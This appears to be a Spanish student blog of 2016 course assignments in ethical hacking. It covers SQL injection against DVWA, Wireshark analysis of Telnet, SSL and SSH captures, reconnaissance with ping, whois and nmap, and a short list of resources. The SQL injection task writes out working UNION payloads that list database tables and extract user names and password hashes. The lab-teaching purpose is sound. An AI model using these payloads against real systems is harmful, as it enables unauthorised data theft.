miércoles, 28 de septiembre de 2016

Enigma

El Enigma

Pasos para resolver el enigma para el reto



Cuando  accedemos al servidor que nos proporciona http://pruebas.euskalert.net/ 

Marcamos el nivel de seguridad en low en DVWA Security y vamos a la pestaña SQL Injection.

Entonces como ya sabemos el nombre de la tabla que nos facilitaron "guestbook", entonces conseguiremos la información acerca de la contraseña del txt cifrado de guestbook, para obtener esa información lo único que tenemos que hacer es ingresar el siguiente comando

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'guestbook' # 



Para ver una información adicional que no facilite la resolución del enigma  ponemos el siguiente comando 

%' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name) from  guestbook #



Como podemos observar nos proporciona una contraseña ==> "use the force".

Entonces el archivo que se descargo tenemos cifrar y para esto utilizaremos lo que es el programa Kleopatra.



Ponemos en descifrar y cifrar para desencryptarlo con la contraseña encontrada que nos proporciono.


Entonces se nos genera un txt y lo abrimos y estaría resuelto el Enigma.



Unidad 2. Tarea 2

TAREA 2: SQL injection
Aqui vamos a usar la técnica SQL injection para obtener información relevante sobre la estructura de una base de datos, vamos a obtener información de usuarios de un servidor (nombre de usuario, hash de la contraseña) a partir de un ataque de SQL injection.
Para ello necesitaras usar una máquina virtual preparada para el software de simulación VirtualBox. Si no tienes instalado VirtualBox puedes descargar el instalador desde la siguiente página web:
Ya una vez descargada podemos iniciarlo
Cuando termine de iniciarse la máquina virtual obtendremos  la dirección IP que ha obtenido por DHCP y que deberemos usar posteriormente para conectarnos a ella.
Una vez anotada la dirección IP y mediante el navegador web accede a la dirección proporcionada.
Entonces ponemos el user y password y entramos a la siguiente pagina
Tenemos que cambiar el nivel de seguridad a low:
Como siguiente paso nos vamos hacia SQL injection y realizamos una búsqueda al ID1


Aquí vamos a mostrar todos los registros que son falsos y  los registros que son verdaderos, con el siguiente comando %' or '0'='0



Si queremos saber que versión de base de datos están utilizando escribimos el siguiente comando %' or 0=0 union select null, version() #


Si queremos mostrar los usuarios de la base de datos escribimos el siguiente comando, %' or 0=0 union select null, user() #
Si queremos mostrar el nombre de la base de datos ponemos  el siguiente comando %' or 0=0 union select null, database() #

Mostrar todas las tablas de INFORMATION_SCHEMA (esquema de la base)
%' and 1=0 union select null, table_name from information_schema.tables #



Mostrar todas las tablas de usuario de INFORMATION_SCHEMA %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#



Mostrar todas las columnas de campo de contenidos en la tabla de usuario INFORMATION_SCHEMA utilizaremos el siguiente comando
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #











Unidad 2. Tarea 1

TAREA 1: Capturando tráfico con Wireshark

Como Wireshark es un analizador de protocolos e investiga qué está pasando en una red pero también nos sirve para aprender sobre protocolos de comunicaciones, vamos a utilizar esta maravillosa herramienta para analizar un protocolo inseguro.

Primera parte: analizando un protocolo inseguro - Telnet.

Bueno vamos a analizar trazas (capturas) y para esto vamos a utilizar lo que es la  traza telnet-raw.pcap, del repositorio de capturas disponible en Wireshark.


Un consejo que se ha recomendado es que utilicemos un filtro para observar mejor el tráfico de Telnet como se puede apreciar en la imagen.


Con la información que nos brinda el programa Wireshark podemos visualizar la siguiente información.


Entonces con esto podemos contestar las pregutas proporcionadas hacia nosotros.

  • ¿Qué usuario y contraseña se ha utilizado para acceder al servidor de Telnet?
Usuario: ffaakkee
Password: user
  • ¿Qué sistema operativo corre en la máquina?
SO: OpenBSD
  • ¿Qué comandos se ejecutan en esta sesión?
Comandos:

$ llss
.
$ llss  --aa
.
.         ..        .cshrc    .login    .mailrc   .profile  .rhosts
$ //ssbbiinn//ppiinngg  wwwwww..yyaahhoooo..ccoomm
.
PING www.yahoo.com 
$ eexxiitt


Segunda parte: analizando SSL.

Como nos proporciona en la informacion SSL es un protocolo seguro que utilizan otros protocolos de aplicación como HTTP. Usa certificados digitales X.509 para asegurar la conexión, entonces  descargamos esta traza con tráfico SSL y  con esto procedemos a abrirlo con el programa Wireshark.

Entonces ya con esta información colectada podemos responder a las siguientes preguntas:

  • ¿Puedes identificar en qué paquete de la trama el servidor envía el certificado?
El certificado se esta enviado en el segundo paquete
  • ¿El certificado va en claro o está cifrado? ¿Puedes ver, por ejemplo, qué autoridad ha emitido el certificado?
El certificado esta en claro y lo a emitido VERSING
  • ¿Qué asegura el certificado, la identidad del servidor o del cliente?

Los certificados SSL se aseguran la identidad del servidor.

Tercera parte: analizando SSH.


En la primera parte de este ejercicio hemos visto un protocolo no seguro, como Telnet. Una alternativa a usar Telnet a la hora de conectarnos a máquinas remotas es SSH, que realiza una negociación previa al intercambio de datos de usuario. A partir de esta negociación, el tráfico viaja cifrado.


 Descarga esta traza con tráfico SSH y abrela con Wireshark.

  • ¿Puedes ver a partir de qué paquete comienza el tráfico cifrado?
 Se puede visualizar que comienza desde el paquete 13




  • ¿Qué protocolos viajan cifrados, todos (IP, TCP...) o alguno en particular?
Se puede visualizar que el  protocolo SSHv2 viaja cifrado 

  • ¿Es posible ver alguna información de usuario como contraseñas de acceso?

No seria posible la visualización porque la información esta viajando cifrada.








Unidad 2. Tarea 3

TAREA 3: debate sobre ética del hacker


lunes, 19 de septiembre de 2016

Unidad 1. Tarea 2



TAREA 2: Búsqueda y puesta en común de recursos


1,2.- Todo donde  averiguar sobre el hacking, les dejo 21 blogs que son eficientes para obtener el conocimiento necesario sobre el hacker también podrás  responder a tus dudas asi como también ayudar a los demás. 

 Aquí en enlace: https://thehackerway.com/2014/05/21/21-blogs-sobre-seguridad-informatica-que-deberias-conocer/ 

 Aquí en enlace: http://hacking-etico.com/ 


3.- Todo donde desees preguntar, averiguar, y responder a tus dudas sobre el arte del hacking, desde el nivel básico hasta le nivel avanzado y tambien donde puedes compartir tus conocimientos. 

 Aquí en enlace: https://foro.hackxcrack.net/  

Saludos...!!

miércoles, 14 de septiembre de 2016

Unidad 1. Tarea 1

TAREA 1: Herramientas básicas para obtener información de servidores externos

1.- ping
Para ello vamos a utilizar el comando "ping" del terminal del ordenador para ver si esta disponible el host de la dirección www.euskalert.net
Como podemos visualizar no envía como respuesta "Tiempo de espera agotado para esta solicitud", que nos indica que hay un bloqueo departe del ICMP ya que esto lo visualice de diferentes blogs ya publicados, pero sabemos la dirección IP "193.146.78.12" .
2.- whois
Busca información sobre el dominio que estamos investigando (euskalert.net). Puedes consultar el nombre de dominio o la dirección IP (que has averiguado cuando has hecho ping). Encuentra la persona que figura como contacto técnico y como contacto administrativo.
3.- Nmap
En este caso utilizaremos la herramienta nmap
Podemos ver que el puerto 80 esta abierta y por lo que se ve hay 1000 puertos escaneados, pero no podemos tener la visualización completa como queremos ya que el host se encuentra en estado de down deberíamos escanear en estado de up.